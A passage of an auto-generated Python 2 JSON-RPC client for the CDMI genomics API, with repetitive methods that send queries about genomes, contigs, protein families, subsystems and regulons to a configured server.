ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def roles_to_protein_families(self, roles):
arg_hash = {'method': 'CDMI_API.roles_to_protein_families',
'params': [roles],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_coexpressed_fids(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_coexpressed_fids',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def protein_families_to_fids(self, protein_families):
arg_hash = {'method': 'CDMI_API.protein_families_to_fids',
'params': [protein_families],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def protein_families_to_proteins(self, protein_families):
arg_hash = {'method': 'CDMI_API.protein_families_to_proteins',
'params': [protein_families],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def protein_families_to_functions(self, protein_families):
arg_hash = {'method': 'CDMI_API.protein_families_to_functions',
'params': [protein_families],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def protein_families_to_co_occurring_families(self, protein_families):
arg_hash = {'method': 'CDMI_API.protein_families_to_co_occurring_families',
'params': [protein_families],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def co_occurrence_evidence(self, pairs_of_fids):
arg_hash = {'method': 'CDMI_API.co_occurrence_evidence',
'params': [pairs_of_fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def contigs_to_sequences(self, contigs):
arg_hash = {'method': 'CDMI_API.contigs_to_sequences',
'params': [contigs],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def contigs_to_lengths(self, contigs):
arg_hash = {'method': 'CDMI_API.contigs_to_lengths',
'params': [contigs],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def contigs_to_md5s(self, contigs):
arg_hash = {'method': 'CDMI_API.contigs_to_md5s',
'params': [contigs],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def md5s_to_genomes(self, md5s):
arg_hash = {'method': 'CDMI_API.md5s_to_genomes',
'params': [md5s],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def genomes_to_md5s(self, genomes):
arg_hash = {'method': 'CDMI_API.genomes_to_md5s',
'params': [genomes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def genomes_to_contigs(self, genomes):
arg_hash = {'method': 'CDMI_API.genomes_to_contigs',
'params': [genomes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def genomes_to_fids(self, genomes, types_of_fids):
arg_hash = {'method': 'CDMI_API.genomes_to_fids',
'params': [genomes, types_of_fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def genomes_to_taxonomies(self, genomes):
arg_hash = {'method': 'CDMI_API.genomes_to_taxonomies',
'params': [genomes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def genomes_to_subsystems(self, genomes):
arg_hash = {'method': 'CDMI_API.genomes_to_subsystems',
'params': [genomes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def subsystems_to_genomes(self, subsystems):
arg_hash = {'method': 'CDMI_API.subsystems_to_genomes',
'params': [subsystems],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def subsystems_to_fids(self, subsystems, genomes):
arg_hash = {'method': 'CDMI_API.subsystems_to_fids',
'params': [subsystems, genomes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def subsystems_to_roles(self, subsystems, aux):
arg_hash = {'method': 'CDMI_API.subsystems_to_roles',
'params': [subsystems, aux],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def subsystems_to_spreadsheets(self, subsystems, genomes):
arg_hash = {'method': 'CDMI_API.subsystems_to_spreadsheets',
'params': [subsystems, genomes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_roles_used_in_models(self):
arg_hash = {'method': 'CDMI_API.all_roles_used_in_models',
'params': [],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def complexes_to_complex_data(self, complexes):
arg_hash = {'method': 'CDMI_API.complexes_to_complex_data',
'params': [complexes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def genomes_to_genome_data(self, genomes):
arg_hash = {'method': 'CDMI_API.genomes_to_genome_data',
'params': [genomes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_regulon_data(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_regulon_data',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def regulons_to_fids(self, regulons):
arg_hash = {'method': 'CDMI_API.regulons_to_fids',
'params': [regulons],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_feature_data(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_feature_data',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def equiv_sequence_assertions(self, proteins):
arg_hash = {'method': 'CDMI_API.equiv_sequence_assertions',
'params': [proteins],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_atomic_regulons(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_atomic_regulons',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def atomic_regulons_to_fids(self, atomic_regulons):
arg_hash = {'method': 'CDMI_API.atomic_regulons_to_fids',
'params': [atomic_regulons],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_protein_sequences(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_protein_sequences',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_proteins(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_proteins',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_dna_sequences(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_dna_sequences',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def roles_to_fids(self, roles, genomes):
arg_hash = {'method': 'CDMI_API.roles_to_fids',
'params': [roles, genomes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def reactions_to_complexes(self, reactions):
arg_hash = {'method': 'CDMI_API.reactions_to_complexes',
'params': [reactions],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def aliases_to_fids(self, aliases):
arg_hash = {'method': 'CDMI_API.aliases_to_fids',
'params': [aliases],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def aliases_to_fids_by_source(self, aliases, source):
arg_hash = {'method': 'CDMI_API.aliases_to_fids_by_source',
'params': [aliases, source],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def source_ids_to_fids(self, aliases):
arg_hash = {'method': 'CDMI_API.source_ids_to_fids',
'params': [aliases],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
